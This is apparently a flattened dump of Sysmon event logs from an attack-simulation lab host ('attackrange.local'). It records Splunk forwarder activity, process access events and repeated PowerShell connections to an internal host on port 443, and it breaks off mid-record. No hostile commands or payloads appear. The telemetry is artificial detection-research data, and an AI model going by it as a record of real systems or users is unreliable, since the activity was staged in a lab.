22:02:26.865{B81B27B7-8472-613A-FA96-03000000C801}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26119F71090A8357D3641DC87F81F35C,SHA256=61003B205A4C4089D75B76CB18711640CA0B81696FB5C45F39F548A039F12F2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC37170920A105A6B590F4B6FFE02A47,SHA256=7546DBA6EF2924DEC7C1CF193214CFD28609EF50854765347B39DF3E845CEE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.865{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C247B31DAA7BFD18096BDB082933CF7,SHA256=62B2625671F8747B041B6EA239514DAC40CEF0DC6998381195187E603C2B78D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.749{B81B27B7-8473-613A-FB96-03000000C801}17444160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.565{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8473-613A-FB96-03000000C801}1744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.565{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.565{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.565{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.565{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.565{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8473-613A-FB96-03000000C801}1744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.565{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8473-613A-FB96-03000000C801}1744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.550{B81B27B7-8473-613A-FB96-03000000C801}1744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:27.149{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2761BA62DFBBC1D3E8C5B6E28B5601C2,SHA256=38740FF98C2B63DBE3B4F486D615C90110869B249BC183C97742A034F2C5F8A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:28.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FE6E9D3188A26A6C3C6B9F1BF70CD1BF,SHA256=9E88BE28067CB2390F3CDA3E7E85B9FA2F5E9862045FB5B85077D04ACD9927C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:28.165{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0DF7957C4C0DC04DB98BCDBE67116C9,SHA256=321ABB80494B5D606358B65A9E3D6182C5AACB6409E4F054326772C33F81D30A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:54.400{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62271-false10.0.1.12-8000- 354300x800000000000000035129382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:53.551{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62270-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:29.180{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EF2E86B0A6077938C31D08EE1C615BD,SHA256=2B0BBEB575EDE2075CA79689C112EF4828271BAB419F833279F89DA336364BD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:30.212{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A129662FF8870F44F1F1C2232BA9B49,SHA256=E16878CA4903B827DFC2049D5182DFFB8EBF7525F86C87ABC1C3CF084DCEA0DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:31.230{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2C20FD148A4AB66EC239F971C83031,SHA256=0E03E3E6EFF18E4DFAD2066B6297A7F0448DAAC2B44C297DFC9D977B74C219DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:32.245{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E70D2B1DED40C36C0491B06B11014828,SHA256=68500040BB3DB80730CC6FB28BD632DD36488BB0A05698324A6AEA38688B8FEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:58.561{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62272-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:33.614{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0A2E9C3C1700820618A4ABB93C0A84AA,SHA256=955F73FA4EE08672993682CE57CA1B826E65A4BEBF7F3F675E1D0E551DF29C03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:33.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F41675FE16DE3FF37A59640462290587,SHA256=24DD76F7ED770979742FB04A2259717D9DE0694BB2D52F64E974C302944145FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:33.109{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:33.109{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:33.109{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035129393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:34.309{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98574F3558745DCCCE43AD890B7B7AF0,SHA256=AD6E0AED48DA43F990AA75B2F3ABEED58C49D0F26E7BA97B3C08E76070748D32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:00.361{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62273-false10.0.1.12-8000- 23542300x800000000000000035129394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:35.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A80798431B468620D2560F732448D545,SHA256=E86635535D76EE076B35F15BC582ADD7F7495BEE3EB231255D930743970D299A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:36.342{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3168DBFC0F8C3A77B08ED3888FE29A3,SHA256=B7BB3A9A4245614C99A9522ED565D85091E202907E5BCAFE3EC3ACBF1E36EA78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:37.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=23D2A3FD69559AC2ED9E903D97AD2F47,SHA256=AEF3EDA354CE79E1782F9A2E3D93E067E8F09FA059AAACB524DDDD63C5D61D44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:37.373{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E926C6C886EA52A0B7A4B5A283B0749,SHA256=C678EB38E97B14ECF5CDD67C6AD5240D6CB38092CB48ED6D50D8D5507D4C358E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:03:02.574{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62274-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:38.388{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2A935F2FAA36BF5462DD35D580CA66E,SHA256=45B5F3251C18D937B14FB048DB661D90CF01795D60F966493DF95130B0A6B832,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:38.003{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=62F2A746E20F33ECC73A61EEF6E1DD7A,SHA256=ABBC9DAAC802E7057F89367DC178BC53D77A54BAF0CFB6C8E6301459F3651A0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:39.471{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82CDD6D24A81B8604A151C9C5570F702,SHA256=72C1BA4F16F5BF3F0296741AD7D59DDB873EF80E75214D0769B14473839B736D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.923{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8480-613A-FD96-03000000C801}6440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:40.907{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 